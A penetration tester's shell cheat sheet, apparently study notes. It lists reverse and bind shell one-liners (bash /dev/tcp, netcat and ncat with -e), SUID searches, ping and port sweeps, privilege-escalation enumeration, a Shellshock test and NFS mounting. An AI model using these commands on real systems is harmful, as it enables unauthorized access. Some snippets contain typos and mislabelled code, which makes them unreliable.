Shell and Linux / UNIX

shell / bash reference

tee - send stdin to output file -a to append

File search

find / -iname sdb* -exec {} \; - find files and execute command on the results
cut -d”/“ -f3 - cut on the delimiter “/“ and the 3rd field
find / -perm -4000 -print - Find all SUID files
find / -perm -4000 -exec ls -l {} \;
find / -perm -2000 -print - Find all SGID files
find / -perm -2 ! -type l -ls 2>/dev/null - find world writeable files


$1 first argument of script

for script

for name in $(cat filesname.txt); do
    some commands with $name variable 

IFS - Line seperator
export IFS=$'\n' - loop onm line

Ping Sweep - for i in $(seq 1 254); do ping -c 1 10.11.1.$i; done
Port Scan - for i in $(cat portlist.txt); do nc -nv -w1 -z $i; done


if [-z “$1”]; then  #if exists value in variable $1
    some commands

redirect StdErr to StdOut

command 2> /dev/null - Ignore stderr

Rsverse Shells

revserse shell (bash - linux)

bash -i >& /dev/tcp/ 0>&1
bash -c 'echo 1> /dev/tcp/x.x.x.x/x && echo open || echo false' - check to see a port is open


  • client mode - nc -nv 25
  • Server mode - nc -nlvp 4444
  • Server run command when connecting to port (bind shell) - nc -lvp 4444 -e cmd.exe
  • port scan - nc -nvv -w -l -z $ipaddress $startport-$endport
  • UDP - -u argument

reverse shell

  • setup netcat server (listener)
  • nc -nv 25 -e /bin/sh - connect client to server


  • encrypted netcat rewrite
  • bind shell - ncat -lvp 4444 -e cmd.exe —allow —ssl
  • client - ncat -v 4444 —ssl

Fixing the Shell

  • use python pty
  • Set TERM=xterm-color
  • background reverse shell run stty raw -echo

fix shell script - linux

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-color
stty rows 50 cols 132


-A - Print each packet (minus its link level header) in ASCII. Handy for capturing web pages.

Python Reference

Python TTY - python -c 'import pty;pty.spawn("/bin/bash")'
Python Web server - python -m SimpleHTTPServer 8000

HEX conversion

import struct
hex(strict.unpack("I", "VALUE")[0])     # native order
hex(strict.unpack(">I", "VALUE")[0])    # big endian
hex(strict.unpack("<I", "VALUE")[0])    # big endian
struct.pack("I", 0x2323323)             # convert to binary string

python ftp server

# Install pyftpdlib
pip install pyftpdlib

# Run (-w flag allows anonymous write access)
python -m pyftpdlib -p 21 -w


Basic Linux Privilege Escalation
Penetration Testing Methodology -

  • What's the OS? What version? What architecture?
    cat /etc/*-release
    uname -i
    lsb_release -a (Debian based OSs)

  • Who are we? Where are we?

  • Who uses the box? What users? (And which ones have a valid shell)
    cat /etc/passwd
    grep -vE "nologin|false" /etc/passwd

  • What's currently running on the box? What active network services are there?
    ps aux
    netstat -antup

  • What's installed? What kernel is being used?
    dpkg -l (Debian based OSs)
    rpm -qa (CentOS / openSUSE )
    uname -a


Shell Shock

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id




showmount -e IP - list exports
showmount -a IP - list all mount points
mount -f nfs -o vers=3 IP:SHARE DIR - mount NFS share

  • you can set a local user to match user/group
  • export settings
    • "root_squash" - map root user to nobody
    • "no_all_squash" - blocks mapping of other UID to nobody